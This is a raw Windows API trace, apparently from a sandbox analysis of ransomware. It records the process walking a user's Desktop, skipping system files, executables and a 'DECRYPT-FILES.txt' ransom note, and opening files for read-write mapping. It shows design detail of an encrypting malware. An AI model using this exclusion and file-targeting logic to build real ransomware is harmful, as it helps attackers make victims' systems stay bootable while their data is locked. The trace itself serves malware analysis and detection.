1 [0184.776] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="ntuser.dat") returned -1 [0184.776] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="iconcache.db") returned 1 [0184.776] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="bootsect.bak") returned 1 [0184.776] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="ntuser.dat.log") returned -1 [0184.776] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="thumbs.db") returned -1 [0184.776] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="Bootfont.bin") returned 1 [0184.776] lstrlenW (lpString="lABSAK16Bz2byuU.pps.QiXqj") returned 25 [0184.776] lstrcmpiW (lpString1="QiXqj", lpString2="lnk") returned 1 [0184.776] lstrcmpiW (lpString1="QiXqj", lpString2="exe") returned 1 [0184.776] lstrcmpiW (lpString1="QiXqj", lpString2="sys") returned -1 [0184.776] lstrcmpiW (lpString1="QiXqj", lpString2="dll") returned 1 [0184.776] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.776] lstrlenW (lpString="lABSAK16Bz2byuU.pps.QiXqj") returned 25 [0184.776] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.776] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="lABSAK16Bz2byuU.pps.QiXqj" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps.QiXqj") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps.QiXqj" [0184.776] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps.QiXqj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\labsak16bz2byuu.pps.qixqj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.776] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=75812) returned 1 [0184.776] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.776] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.777] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.777] CloseHandle (hObject=0x260) returned 1 [0184.777] CloseHandle (hObject=0x25c) returned 1 [0184.777] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.778] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b36a060, ftCreationTime.dwHighDateTime=0x1d4cb8c, ftLastAccessTime.dwLowDateTime=0x1c8120c0, ftLastAccessTime.dwHighDateTime=0x1d4d1d9, ftLastWriteTime.dwLowDateTime=0xadf1c6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="m8CE6Ka JeFHefZE.mp4.R8IoO5", cAlternateFileName="M8CE6K~1.R8I")) returned 1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="DECRYPT-FILES.txt") returned 1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="autorun.inf") returned 1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="boot.ini") returned 1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="desktop.ini") returned 1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="ntuser.dat") returned -1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="iconcache.db") returned 1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="bootsect.bak") returned 1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="ntuser.dat.log") returned -1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="thumbs.db") returned -1 [0184.778] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4.R8IoO5", lpString2="Bootfont.bin") returned 1 [0184.778] lstrlenW (lpString="m8CE6Ka JeFHefZE.mp4.R8IoO5") returned 27 [0184.778] lstrcmpiW (lpString1="R8IoO5", lpString2="lnk") returned 1 [0184.778] lstrcmpiW (lpString1="R8IoO5", lpString2="exe") returned 1 [0184.778] lstrcmpiW (lpString1="R8IoO5", lpString2="sys") returned -1 [0184.778] lstrcmpiW (lpString1="R8IoO5", lpString2="dll") returned 1 [0184.778] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.778] lstrlenW (lpString="m8CE6Ka JeFHefZE.mp4.R8IoO5") returned 27 [0184.778] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.778] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="m8CE6Ka JeFHefZE.mp4.R8IoO5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4.R8IoO5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4.R8IoO5" [0184.778] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4.R8IoO5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m8ce6ka jefhefze.mp4.r8ioo5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.779] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=80456) returned 1 [0184.779] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.779] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.781] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.781] CloseHandle (hObject=0x260) returned 1 [0184.781] CloseHandle (hObject=0x25c) returned 1 [0184.781] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.781] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe95dc1c0, ftCreationTime.dwHighDateTime=0x1d4c941, ftLastAccessTime.dwLowDateTime=0xa5363ad0, ftLastAccessTime.dwHighDateTime=0x1d4cec9, ftLastWriteTime.dwLowDateTime=0xadf42800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8301, dwReserved0=0x0, dwReserved1=0x0, cFileName="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", cAlternateFileName="NGWB1V~1.PMG")) returned 1 [0184.781] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="DECRYPT-FILES.txt") returned 1 [0184.781] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="autorun.inf") returned 1 [0184.781] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="boot.ini") returned 1 [0184.781] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="desktop.ini") returned 1 [0184.781] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="ntuser.dat") returned -1 [0184.782] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="iconcache.db") returned 1 [0184.782] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="bootsect.bak") returned 1 [0184.782] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="ntuser.dat.log") returned -1 [0184.782] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="thumbs.db") returned -1 [0184.782] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO", lpString2="Bootfont.bin") returned 1 [0184.782] lstrlenW (lpString="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO") returned 31 [0184.782] lstrcmpiW (lpString1="pmgb3yO", lpString2="lnk") returned 1 [0184.782] lstrcmpiW (lpString1="pmgb3yO", lpString2="exe") returned 1 [0184.782] lstrcmpiW (lpString1="pmgb3yO", lpString2="sys") returned -1 [0184.782] lstrcmpiW (lpString1="pmgb3yO", lpString2="dll") returned 1 [0184.782] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.782] lstrlenW (lpString="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO") returned 31 [0184.782] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.782] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ngwb1v0Y3cEASEZtz_K.png.pmgb3yO" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png.pmgb3yO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png.pmgb3yO" [0184.782] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png.pmgb3yO" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngwb1v0y3ceaseztz_k.png.pmgb3yo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.782] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=33537) returned 1 [0184.782] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.782] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.783] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.783] CloseHandle (hObject=0x260) returned 1 [0184.783] CloseHandle (hObject=0x25c) returned 1 [0184.783] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.783] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbd8c2f0, ftCreationTime.dwHighDateTime=0x1d4d4f8, ftLastAccessTime.dwLowDateTime=0xe66c7250, ftLastAccessTime.dwHighDateTime=0x1d4d3c2, ftLastWriteTime.dwLowDateTime=0xadf68960, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6f1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="pPDIRTkCKpmKuTY.mkv.YjxjbA2", cAlternateFileName="PPDIRT~1.YJX")) returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="DECRYPT-FILES.txt") returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="autorun.inf") returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="boot.ini") returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="desktop.ini") returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="ntuser.dat") returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="iconcache.db") returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="bootsect.bak") returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="ntuser.dat.log") returned 1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="thumbs.db") returned -1 [0184.784] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv.YjxjbA2", lpString2="Bootfont.bin") returned 1 [0184.784] lstrlenW (lpString="pPDIRTkCKpmKuTY.mkv.YjxjbA2") returned 27 [0184.784] lstrcmpiW (lpString1="YjxjbA2", lpString2="lnk") returned 1 [0184.784] lstrcmpiW (lpString1="YjxjbA2", lpString2="exe") returned 1 [0184.784] lstrcmpiW (lpString1="YjxjbA2", lpString2="sys") returned 1 [0184.784] lstrcmpiW (lpString1="YjxjbA2", lpString2="dll") returned 1 [0184.784] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.784] lstrlenW (lpString="pPDIRTkCKpmKuTY.mkv.YjxjbA2") returned 27 [0184.784] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.784] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="pPDIRTkCKpmKuTY.mkv.YjxjbA2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv.YjxjbA2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv.YjxjbA2" [0184.784] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv.YjxjbA2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ppdirtkckpmkuty.mkv.yjxjba2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.784] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=28447) returned 1 [0184.784] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.785] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.785] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.785] CloseHandle (hObject=0x260) returned 1 [0184.785] CloseHandle (hObject=0x25c) returned 1 [0184.785] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.786] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f28e000, ftCreationTime.dwHighDateTime=0x1d4c8bd, ftLastAccessTime.dwLowDateTime=0x3a24b7a0, ftLastAccessTime.dwHighDateTime=0x1d4c599, ftLastWriteTime.dwLowDateTime=0xadfb4c20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x152e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qi5 gao-vYK.ppt.nsgX", cAlternateFileName="QI5GAO~1.NSG")) returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="DECRYPT-FILES.txt") returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="autorun.inf") returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="boot.ini") returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="desktop.ini") returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="ntuser.dat") returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="iconcache.db") returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="bootsect.bak") returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="ntuser.dat.log") returned 1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="thumbs.db") returned -1 [0184.786] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt.nsgX", lpString2="Bootfont.bin") returned 1 [0184.786] lstrlenW (lpString="Qi5 gao-vYK.ppt.nsgX") returned 20 [0184.786] lstrcmpiW (lpString1="nsgX", lpString2="lnk") returned 1 [0184.786] lstrcmpiW (lpString1="nsgX", lpString2="exe") returned 1 [0184.786] lstrcmpiW (lpString1="nsgX", lpString2="sys") returned -1 [0184.786] lstrcmpiW (lpString1="nsgX", lpString2="dll") returned 1 [0184.786] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.786] lstrlenW (lpString="Qi5 gao-vYK.ppt.nsgX") returned 20 [0184.786] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.786] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Qi5 gao-vYK.ppt.nsgX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt.nsgX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt.nsgX" [0184.786] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt.nsgX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qi5 gao-vyk.ppt.nsgx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.787] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=86760) returned 1 [0184.787] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.787] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.787] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.788] CloseHandle (hObject=0x260) returned 1 [0184.788] CloseHandle (hObject=0x25c) returned 1 [0184.788] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.788] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eaa6320, ftCreationTime.dwHighDateTime=0x1d4c6fa, ftLastAccessTime.dwLowDateTime=0x7e0f74d0, ftLastAccessTime.dwHighDateTime=0x1d4cb63, ftLastWriteTime.dwLowDateTime=0xae000ee0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6034, dwReserved0=0x0, dwReserved1=0x0, cFileName="qtEGCKs8V-.rtf.WYq3z", cAlternateFileName="QTEGCK~1.WYQ")) returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="DECRYPT-FILES.txt") returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="autorun.inf") returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="boot.ini") returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="desktop.ini") returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="ntuser.dat") returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="iconcache.db") returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="bootsect.bak") returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="ntuser.dat.log") returned 1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="thumbs.db") returned -1 [0184.788] lstrcmpiW (lpString1="qtEGCKs8V-.rtf.WYq3z", lpString2="Bootfont.bin") returned 1 [0184.788] lstrlenW (lpString="qtEGCKs8V-.rtf.WYq3z") returned 20 [0184.788] lstrcmpiW (lpString1="WYq3z", lpString2="lnk") returned 1 [0184.788] lstrcmpiW (lpString1="WYq3z", lpString2="exe") returned 1 [0184.788] lstrcmpiW (lpString1="WYq3z", lpString2="sys") returned 1 [0184.788] lstrcmpiW (lpString1="WYq3z", lpString2="dll") returned 1 [0184.788] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.788] lstrlenW (lpString="qtEGCKs8V-.rtf.WYq3z") returned 20 [0184.788] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.788] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="qtEGCKs8V-.rtf.WYq3z" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf.WYq3z") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf.WYq3z" [0184.788] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf.WYq3z" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qtegcks8v-.rtf.wyq3z"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.789] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=24628) returned 1 [0184.789] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.789] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.790] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.790] CloseHandle (hObject=0x260) returned 1 [0184.790] CloseHandle (hObject=0x25c) returned 1 [0184.790] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.790] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33b1fae0, ftCreationTime.dwHighDateTime=0x1d4cdaf, ftLastAccessTime.dwLowDateTime=0xde52fcf0, ftLastAccessTime.dwHighDateTime=0x1d4cc8e, ftLastWriteTime.dwLowDateTime=0xae04d1a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x417a, dwReserved0=0x0, dwReserved1=0x0, cFileName="qUqlKc5CiBNKH6.mkv.TNBUDN", cAlternateFileName="QUQLKC~1.TNB")) returned 1 [0184.790] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="DECRYPT-FILES.txt") returned 1 [0184.790] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="autorun.inf") returned 1 [0184.790] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="boot.ini") returned 1 [0184.791] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="desktop.ini") returned 1 [0184.791] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="ntuser.dat") returned 1 [0184.791] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="iconcache.db") returned 1 [0184.791] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="bootsect.bak") returned 1 [0184.791] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="ntuser.dat.log") returned 1 [0184.791] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="thumbs.db") returned -1 [0184.791] lstrcmpiW (lpString1="qUqlKc5CiBNKH6.mkv.TNBUDN", lpString2="Bootfont.bin") returned 1 [0184.791] lstrlenW (lpString="qUqlKc5CiBNKH6.mkv.TNBUDN") returned 25 [0184.791] lstrcmpiW (lpString1="TNBUDN", lpString2="lnk") returned 1 [0184.791] lstrcmpiW (lpString1="TNBUDN", lpString2="exe") returned 1 [0184.791] lstrcmpiW (lpString1="TNBUDN", lpString2="sys") returned 1 [0184.791] lstrcmpiW (lpString1="TNBUDN", lpString2="dll") returned 1 [0184.791] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.791] lstrlenW (lpString="qUqlKc5CiBNKH6.mkv.TNBUDN") returned 25 [0184.791] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") 